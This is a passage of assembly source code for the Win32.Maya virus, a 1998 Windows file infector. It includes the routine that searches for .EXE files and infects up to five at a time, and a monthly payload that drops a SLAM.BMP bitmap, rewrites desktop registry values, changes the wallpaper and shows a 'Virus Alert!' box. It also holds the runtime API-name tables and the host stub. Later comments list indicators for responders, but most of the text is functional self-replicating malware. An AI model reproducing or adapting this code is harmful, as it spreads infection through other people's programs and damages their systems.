push eax ;store parameter (lpFileName = '*.EXE')
mov eax,[ebp+offset maya_findfirstfilea_add];get add of FindFirstFileA
call eax ;call function
pop ebp
cmp eax,-1 ;failed? (INVALID_HANDLE_VALUE)
je maya_process_current_directory_return;yes
mov [ebp+offset maya_findhandle],eax ;store handle
mov edx,offset maya_finddata._fname ;get ptr to filename
add edx,ebp ;add delta offset
call maya_infect ;try to infect file
cmp dword ptr[ebp+offset maya_successfull_infection],1 ;check flag
jne maya_process_current_directory_findnext
inc dword ptr[ebp+offset maya_infection_counter] ;increment counter
cmp dword ptr[ebp+offset maya_infection_counter],5;already infected 5 files?
je maya_process_current_directory_return ;yes so return to caller
maya_process_current_directory_findnext:
push ebp ;keep delta across the API call
mov eax,offset maya_finddata ;get add of structure
add eax,ebp ;add delta offset
push eax ;store parameter (lpFindFileData)
push dword ptr[ebp+offset maya_findhandle] ;store parameter (hFindFile)
mov eax,[ebp+offset maya_findnextfilea_add] ;get add of FindNextFileA
call eax ;call function
pop ebp
cmp eax,0 ;found more?
je maya_process_current_directory_return;nope
mov edx,offset maya_finddata._fname ;get filename
add edx,ebp ;add delta offset
call maya_infect ;try to infect file
cmp dword ptr[ebp+offset maya_successfull_infection],1 ;inf ok?
jne maya_process_current_directory_findnext ;nope proceed
inc dword ptr[ebp+offset maya_infection_counter] ;inc counter
cmp dword ptr[ebp+offset maya_infection_counter],5 ;already 5?
je maya_process_current_directory_return ;yes return to caller
jmp maya_process_current_directory_findnext ;nope find more files
maya_process_current_directory_return:
ret ;return to caller
maya_payload: ;@1701
;
;on the 1st of any month,creates a slam.bmp file containing a SLAM logo
;and sets the wallpaper to it.Then displays a messagebox.
;
;Artifacts a responder can look for: the dropped bitmap (maya_slamfilename),
;the values 'Tilewallpaper'='1' and 'WallpaperStyle'='0' under
;HKEY_CURRENT_USER\Control Panel\Desktop, a SystemParametersInfo
;(SPI_SETDESKWALLPAPER) call and a MessageBoxA with the maya_viralert /
;maya_mayamsg strings. Return codes of the registry and wallpaper calls are
;not checked. The strings and the bitmap are not part of this excerpt.
call maya_getsystime ;fill system time structure
cmp word ptr[ebp+offset maya_systime.wday],1 ;1st of any month? (wDay of SYSTEMTIME)
jne maya_payload_return ;nope abort
mov eax,offset maya_user32 ;ptr to 'USER32.dll' string
add eax,ebp ;add delta offset
call maya_getmodhand ;get hModule to user32
cmp eax,0 ;failed?
je maya_payload_return ;yes abort
mov [ebp+offset maya_u32hand],eax ;store hModule to user32
mov eax,offset maya_advapi32 ;ptr to 'ADVAPI32.dll' string
add eax,ebp ;add delta offset
call maya_getmodhand ;get hModule
cmp eax,0 ;failed?
je maya_payload_return ;yes abort
mov [ebp+offset maya_a32hand],eax ;store hModule
mov edx,offset maya_regopenkeyexa ;get ptr
add edx,ebp ;add delta offset
mov eax,[ebp+offset maya_a32hand] ;get handle to advapi32
call maya_getprocadd ;get add of RegOpenKeyExA fn
cmp eax,0 ;failed?
je maya_payload_return ;yes abort
mov [ebp+offset maya_regopenkeyexa_add],eax ;store add
;
;now gets the address of 3 more fn's:RegSetValueExA,MessageBoxA,
;and SystemParametersInfo.It is identical to the method above,
;so i dont waste time commenting it
;
mov edx,offset maya_regsetvalueexa ;asciiz of fn
add edx,ebp
mov eax,[ebp+offset maya_a32hand]
call maya_getprocadd
cmp eax,0
je maya_payload_return
mov [ebp+offset maya_regsetvalueexa_add],eax ;store add
mov edx,offset maya_messageboxa ;asciiz of fn
add edx,ebp
mov eax,[ebp+offset maya_u32hand]
call maya_getprocadd
cmp eax,0
je maya_payload_return
mov [ebp+offset maya_messageboxa_add],eax ;store add
mov edx,offset maya_sysparam
add edx,ebp ;add delta offset
mov eax,[ebp+offset maya_u32hand] ;get handle to user32.dll
call maya_getprocadd ;call fn
cmp eax,0 ;failed?
je maya_payload_return ;yes abort
;
;creates the .bmp file
;
mov [ebp+offset maya_sysparam_add],eax
push 0 ;hTemplate is null
push 80h ;attribute normal
push 2 ;create always,overwrite if exists
push 0 ;no security attrs struct,so we pass null
push 1 ;share_read
push 40000000h ;generic write access
mov eax,offset maya_slamfilename;ptr to filename
add eax,ebp ;add delta offset
push eax ;ptr to filename
mov eax,[ebp+offset maya_createfilea_add];get fn add
call eax ;call CreateFileA()
cmp eax,-1 ;failed?
je maya_payload_return ;yes abort
mov [ebp+offset maya_slamhandle],eax ;store handle
push 0 ;null as overlapped ptr to WriteFile
mov eax,offset maya_numberofwritten ;add of room
;for # of written bytes
add eax,ebp ;plus delta offset
push eax ;store parameter
push dword ptr slam_len ;length of .bmp
mov eax,offset slam ;ptr to .bmp
add eax,ebp ;plus delta offset
push eax ;store parameter
push dword ptr [ebp+offset maya_slamhandle] ;store handle for WriteFile
mov eax,[ebp+offset maya_writefile_add] ;get add of fn
call eax ;call fn (WriteFile's result is not checked)
push dword ptr[ebp+offset maya_slamhandle];push handle
mov eax,[ebp+offset maya_closehandle_add];get fn add
call eax ;call fn (CloseHandle)
;
;registry manipulations to modify wallpaper
;
mov eax,offset maya_reg ;address of result
add eax,ebp ;add delta offset
push eax ;pass param (phkResult)
push 2 ;desired access:KEY_SET_VALUE
push 0 ;reserved,must be null
mov eax,offset maya_cpd ;ptr to 'Control Panel\Desktop'
add eax,ebp ;add delta offset
push eax ;pass param (lpSubKey)
push 80000001h ;HKEY_CURRENT_USER
mov eax,[ebp+offset maya_regopenkeyexa_add];get fn address
call eax ;call RegOpenKeyExA (result not checked)
push 2 ;size of value data
mov eax,offset maya_one ;'1' character
add eax,ebp ;add delta offset
push eax ;pass param (lpData)
push 1 ;type of data:1=zero terminated
;string (REG_SZ)
push 0 ;reserved,must be null
mov eax,offset maya_tilewallpaper ;ptr to 'Tilewallpaper'
add eax,ebp ;add delta offset
push eax ;value name to set
push dword ptr [ebp+offset maya_reg] ;hKey
mov eax,[ebp+offset maya_regsetvalueexa_add]
call eax ;call fn (RegSetValueExA)
push 2 ;size of value data
mov eax,offset maya_zero ;'0' character
add eax,ebp ;add delta offset
push eax ;pass param (lpData)
push 1 ;data type (REG_SZ)
push 0 ;reserved
mov eax,offset maya_wallpaperstyle ;ptr to value name
add eax,ebp ;add delta offset
push eax ;pass param
push dword ptr[ebp+offset maya_reg] ;hKey
mov eax,[ebp+offset maya_regsetvalueexa_add];get fn add
call eax ;call fn (RegSetValueExA)
push 0 ;fWinIni
mov eax,offset maya_slamfilename ;file containing .bmp
add eax,ebp ;add delta offset
push eax ;pass param (pvParam = path of the new wallpaper)
push 0 ;uiParam
push 14h ;SPI_SETDESKWALLPAPER
mov eax,[ebp+offset maya_sysparam_add] ;get fn add
call eax ;call fn:update desktop
;
;messagebox
;
push 30h ;MB_OK+MB_ICONEXCLAMATION style
mov eax,offset maya_viralert ;title of msgbox
add eax,ebp ;add delta offset
push eax ;pass param
mov eax,offset maya_mayamsg ;ptr to msg of msgbox
add eax,ebp ;add delta offset
push eax ;pass param
push 0 ;hWnd of caller (virus)
mov eax,[ebp+offset maya_messageboxa_add] ;get fn add
call eax ;call MessageBox fn
maya_payload_return:
ret ;return to caller
;
;data related to virus
;
;These variables sit inside the virus body and travel with it into each
;victim; the code always reaches them as [ebp+offset name]. The @xxxx
;values are the disassembler's original offsets.

maya_msg db 'To Aparna S. : Forever in love with you...' ;embedded text, not referenced by the code shown here
;
;
;

maya_addof_k32 dd 0 ;address of KERNEL32.dll module
maya_imagebase dd 0 ;imagebase of host @18FC
maya_windir db 128 dup(0) ;room for Windows directory ASCIIZ string @1900
maya_currdir db 128 dup (0) ;room for current directory ASCIIZ string @1980
maya_systime win32systime ;win32 system time structure @1A00
maya_finddata _find_data ;finddata structure for file searches @1A10


maya_fileattrib dd 0 ;attribute of victim @1B58
maya_successfull_infection dd 0 ;flag that indicates the infection
;routines completed operation @1B5C
maya_infection_counter dd 0 ;counter of infections @1B60 (each search pass stops at 5)
maya_eat dd 0 ;export address table (AddressOfFunctions of KERNEL32)
maya_expnames dd 0 ;exported names (AddressOfNames)
maya_eord dd 0 ;exports ordinals (AddressOfNameOrdinals)
maya_ilt dd 0 ;import lookup table rva (actually the host's FirstThunk/IAT, see maya_lookup_getmodulehandle)


maya_findhandle dd 0 ;handle used in file searches
maya_filemask db '*.EXE',0 ;filemask used to find victims @1B51

maya_filesize_high_dword dd 0 ;hi dword of filesize @1B74
maya_filesize dd 0 ;lo dword of filesize @1B78
maya_handle dd 0 ;handle of file being infected @1B7C
maya_maphandle dd 0 ;handle of filemapping object @1B80
maya_mappedadd dd 0 ;address where file is mapped @1B84
maya_peptr dd 0 ;PE head ptr @1B88
maya_ptrtolastsection dd 0 ;ptr to last entry in section table @1B8C
maya_filealign dd 0 ;file alignment unit size @1B90
maya_entry_of_host dd 3000h ;host entry rva @1B94
; yikes--hardcoded for 1st generation:)
;(in every infected copy this holds the victim's original AddressOfEntryPoint,
;written by maya_infect; maya_restart_host adds the imagebase and jumps there)

maya_sectrva dd 0 ;rva of viral section @1B98
maya_olderva dd 0 ;temporary storage of host entry point @1B9C
maya_sectps dd 0 ;PhysSize of last section @1BA0
maya_k32 db 'KERNEL32.dll',0 ;@1BA4
|
||
|
;
;api names
;
; Table of KERNEL32 export names the virus resolves at run time. Each entry
; has three fields: the name length INCLUDING the terminating NUL (e.g. 17
; for 'GetModuleHandleA'), the ASCIIZ name, and a dword slot that receives
; the resolved address. The *_add slots are what the code calls through
; ('mov eax,[ebp+offset xxx_add]' / 'call eax', as in the payload above).
; The dword 'MAYA' closes the table.
; Defender note: because these APIs are presumably located by name rather
; than imported, they do not show up in the host's import table; the
; strings themselves, in this fixed order, are the observable artefact.
maya_getmodulehandlea_len dd 17 ;@1BB1
maya_getmodulehandlea db 'GetModuleHandleA',0
maya_getmodulehandlea_add dd 0

maya_getprocaddress_len dd 15
maya_getprocaddress db 'GetProcAddress',0
maya_getprocaddress_add dd 0

maya_createfilea_len dd 12
maya_createfilea db 'CreateFileA',0
maya_createfilea_add dd 0

maya_writefile_len dd 10
maya_writefile db 'WriteFile',0
maya_writefile_add dd 0

maya_getfilesize_len dd 12
maya_getfilesize db 'GetFileSize',0
maya_getfilesize_add dd 0

maya_createfilemappinga_len dd 19
maya_createfilemappinga db 'CreateFileMappingA',0
maya_createfilemappinga_add dd 0

maya_mapviewoffile_len dd 14
maya_mapviewoffile db 'MapViewOfFile',0
maya_mapviewoffile_add dd 0

maya_unmapviewoffile_len dd 16
maya_unmapviewoffile db 'UnmapViewOfFile',0
maya_unmapviewoffile_add dd 0

maya_closehandle_len dd 12
maya_closehandle db 'CloseHandle',0
maya_closehandle_add dd 0

maya_findfirstfilea_len dd 15
maya_findfirstfilea db 'FindFirstFileA',0
maya_findfirstfilea_add dd 0

maya_findnextfilea_len dd 14
maya_findnextfilea db 'FindNextFileA',0
maya_findnextfilea_add dd 0

maya_findclose_len dd 10
maya_findclose db 'FindClose',0
maya_findclose_add dd 0

maya_setfilepointer_len dd 15
maya_setfilepointer db 'SetFilePointer',0
maya_setfilepointer_add dd 0

maya_setendoffile_len dd 13
maya_setendoffile db 'SetEndOfFile',0
maya_setendoffile_add dd 0

maya_getcurrentdirectorya_len dd 15h ;15h = 21 = 20 chars + NUL
maya_getcurrentdirectorya db 'GetCurrentDirectoryA',0
maya_getcurrentdirectorya_add dd 0

maya_setcurrentdirectorya_len dd 15h
maya_setcurrentdirectorya db 'SetCurrentDirectoryA',0
maya_setcurrentdirectorya_add dd 0

maya_getfileattributesa_len dd 13h ;13h = 19 = 18 chars + NUL
maya_getfileattributesa db 'GetFileAttributesA',0
maya_getfileattributesa_add dd 0

maya_setfileattributesa_len dd 13h
maya_setfileattributesa db 'SetFileAttributesA',0
maya_setfileattributesa_add dd 0

maya_getsystemtime_len dd 14
maya_getsystemtime db 'GetSystemTime',0
maya_getsystemtime_add dd 0

maya_getwindowsdirectorya_len dd 15h
maya_getwindowsdirectorya db 'GetWindowsDirectoryA',0
maya_getwindowsdirectorya_add dd 0

maya_maya dd 'MAYA' ;endmarker
                    ;fixed 4-byte terminator of the table (byte order in
                    ;memory is assembler-dependent for a dword literal)
; Second API table. Same length/name/address-slot layout as the table above,
; but every entry carries a fourth field: a pointer to a maya_deadcode_callN
; routine (defined elsewhere in the file, outside this view). The label
; names suggest these routines are never reached - TODO confirm by tracing
; the callers. The dword 'SHAI' closes the table.
; NOTE(review): the names here (MoveFileA, CopyFileA, DeleteFileA,
; CreateProcessA, GetFullPathNameA, ...) are capabilities the table would
; give a variant; treat them as an indicator of intent, not as evidence
; that this build performs those actions.
maya_movefilea_len dd 10
maya_movefilea db 'MoveFileA',0
maya_movefilea_add dd 0
dd offset maya_deadcode_call1 ;absolute address of the stub routine

maya_copyfilea_len dd 10
maya_copyfilea db 'CopyFileA',0
maya_copyfilea_add dd 0
dd offset maya_deadcode_call2

maya_createfilea2_len dd 12 ;duplicate of the CreateFileA entry above
maya_createfilea2 db 'CreateFileA',0
maya_createfilea2_add dd 0
dd offset maya_deadcode_call3

maya_deletefilea_len dd 12
maya_deletefilea db 'DeleteFileA',0
maya_deletefilea_add dd 0
dd offset maya_deadcode_call4

maya_setfileattributesa2_len dd 13h ;duplicate of the entry in the first table
maya_setfileattributesa2 db 'SetFileAttributesA',0
maya_setfileattributesa2_add dd 0
dd offset maya_deadcode_call5

maya_getfileattributesa2_len dd 13h ;duplicate of the entry in the first table
maya_getfileattributesa2 db 'GetFileAttributesA',0
maya_getfileattributesa2_add dd 0
dd offset maya_deadcode_call6

maya_getfullpathnamea_len dd 11h ;11h = 17 = 16 chars + NUL
maya_getfullpathnamea db 'GetFullPathNameA',0
maya_getfullpathnamea_add dd 0
dd offset maya_deadcode_call7

maya_createprocessa_len dd 15
maya_createprocessa db 'CreateProcessA',0
maya_createprocessa_add dd 0
dd offset maya_deadcode_call8

maya_shai dd 'SHAI' ;endmarker
                    ;fixed 4-byte terminator of the second table
;
;payload stuff
;
; Data used by the wallpaper/message-box payload (the routine ending at
; maya_payload_return above): the registry subkey and value names, the
; wallpaper file name, USER32/ADVAPI32 module and function names with their
; resolved-address slots, and the message box strings.
; Defender note: the observable side effects of that routine are two
; REG_SZ writes (TileWallpaper='1', WallpaperStyle='0') under the subkey
; below, a SystemParametersInfoA(SPI_SETDESKWALLPAPER) call naming
; SLAM.BMP, and a message box titled 'Virus Alert!'.

maya_cpd db 'Control Panel\Desktop',0
                    ;subkey passed to RegOpenKeyExA; the root key and access
                    ;mask are pushed before the call shown above, outside
                    ;this view (presumably HKEY_CURRENT_USER - confirm)
maya_reg dd 0 ;@1E76
                    ;hKey used by both RegSetValueExA calls; presumably
                    ;filled in by RegOpenKeyExA (phkResult not in view)
maya_one db '1',0 ;@1E7A
                    ;value data for TileWallpaper (2 bytes incl. NUL, REG_SZ)
maya_zero db '0',0 ;@1E7C
                    ;value data for WallpaperStyle (2 bytes incl. NUL, REG_SZ)
maya_tilewallpaper db 'TileWallpaper',0 ;@1E7E
maya_wallpaperstyle db 'WallpaperStyle',0
maya_slamfilename db 'SLAM.BMP',0 ;@1E9B
                    ;relative file name handed to SystemParametersInfoA;
                    ;the directory it is created in is not visible here
maya_slamhandle dd 0 ;handle of created SLAM.BMP @1EA4
maya_numberofwritten dd 0 ;parameter of WriteFile (lpNumberOfBytesWritten)
maya_mayamsg db 'Win32.Maya (c) 1998 The Shaitan [SLAM]',0
                    ;message box text (MessageBoxA, style 30h)
maya_viralert db 'Virus Alert!',0
                    ;message box title
maya_user32 db 'USER32.dll',0 ;@1EE0
maya_advapi32 db 'ADVAPI32.dll',0 ;@1EEB
maya_u32hand dd 0 ;handle to user32 @1EF8
maya_a32hand dd 0 ;handle to advapi32 @1EFC
maya_dd5 dd 0 ;???? @1F00
                    ;no reference to this slot is visible in this view
maya_regopenkeyexa db 'RegOpenKeyExA',0 ;@1F04
maya_regsetvalueexa db 'RegSetValueExA',0 ;
maya_messageboxa db 'MessageBoxA',0 ;
maya_sysparam db 'SystemParametersInfoA',0
                    ;the four names above are resolved into the four *_add
                    ;slots below; the payload loads each slot into eax and
                    ;does 'call eax'
maya_regopenkeyexa_add dd 0 ;add of fn @1F43
maya_regsetvalueexa_add dd 0 ;add of fn @1F47
maya_messageboxa_add dd 0 ;add of fn @1F4B
maya_sysparam_add dd 0 ;add of fn @1F4F
;
;the 'SLAM' logo stored in bitmap file format
;
; A complete 230-byte BMP image. The bytes parse as: 'BM' magic (66,77),
; file size 230, pixel-data offset 62, a 40-byte BITMAPINFOHEADER
; (60 x 21 pixels, 1 plane, 1 bit per pixel, no compression, 168 bytes of
; pixel data), a 2-entry black/white palette, then 21 rows of 8 bytes.
; Presumably this is what gets written to SLAM.BMP (maya_slamhandle /
; maya_numberofwritten above); the WriteFile call is outside this view.
; The image is byte-for-byte constant, so it doubles as a static signature
; and lets responders identify a dropped SLAM.BMP by content.
slam_len equ 230 ;@1F53
                    ;length of the image below; equals the BMP's own size
                    ;field (bytes 2..5 = 230)
slam db 66, 77,230, 0, 0, 0, 0, 0, 0, 0, 62, 0, 0, 0, 40, 0, 0, 0, 60
db 0, 0, 0, 21, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0,168, 0, 0, 0
db 196, 14, 0, 0,196, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
db 0,255,255,255, 0,255,255,255,255,255,255,255,240,255,255,255,255,255,255
db 255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255,255,240,224
db 2, 0,131,226, 14, 60,112,224, 2, 0,131,226, 14, 60,112,227,130, 15,131
db 226, 14, 60,112,227,130, 15,131,226, 14, 60,112,227,130, 15,128, 2, 14, 60
db 112,255,130, 15,128, 2, 14, 60,112,224, 2, 31,195,134, 30, 60,112,224, 2
db 63,227,142, 62, 60,112,227,254, 63,227,142, 62, 60,112,227,226, 63,227,142
db 62, 60,112,227,226, 63,227,142, 62, 60,112,227,226, 63,227,142, 62, 60,112
db 224, 2, 63,224, 14, 0, 0,112,224, 2, 63,224, 14, 0, 0,112,255,255,255
db 255,255,255,255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255
db 255,240

maya_end equ $ ;end of the virus body ($ = current location counter)
               ;presumably maya_end - maya is the size appended to each
               ;victim (4153 bytes per the virus name) - TODO confirm
.data                           ;the 1st-generation host stub is assembled into
                                ;the data section, not .text; a stock link
                                ;presumably marks this section non-executable,
                                ;so running it relies on the section flags
                                ;being adjusted after linking - TODO confirm

host:                           ;host program of the 1st generation: nothing
                                ;but a clean exit. Presumably reached through
                                ;maya_entry_of_host (hardcoded to 3000h above)
                                ;- confirm against the built image
        push 0                  ;uExitCode = 0
        call ExitProcess        ;never returns


end maya                        ;program entry point is the 'maya' label
                                ;(defined earlier in the file, outside this
                                ;view), so the virus body runs before the host